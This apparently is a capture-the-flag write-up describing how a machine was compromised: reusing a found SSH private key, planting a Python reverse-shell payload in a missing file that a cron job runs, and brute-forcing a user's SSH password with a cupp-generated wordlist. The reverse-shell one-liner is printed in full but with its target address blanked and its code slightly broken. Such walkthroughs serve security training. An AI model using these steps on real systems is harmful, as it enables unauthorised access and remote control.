HTTP port 80


SSH access as Martin

Looking into the files on the server, we have found a ssh private key

using this private ssh key, we were able to access the server as user Martin

SSH access as Jimmy

Looking into the crontab, we have found the following

somehow, the file in the crontab didn’t exist

creating the missing file with a reverse shell payload

touch /tmp/

echo '#!/usr/bin/python' > /tmp/
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);' >> /tmp/

chmod +x /tmp/

gives us access to the server as user Jimmy


Brute force Hadi account

We couldn’t find anything that could help us root the machine. Now we use the third the user to root the machine. We know that the third user is hadi. So we create a dictionary using this name.

We use cupp to create a dictionary.

SSH as Hadi

Using Hadi credentials (found in the previous step) we were able to access the SSH with admin permissions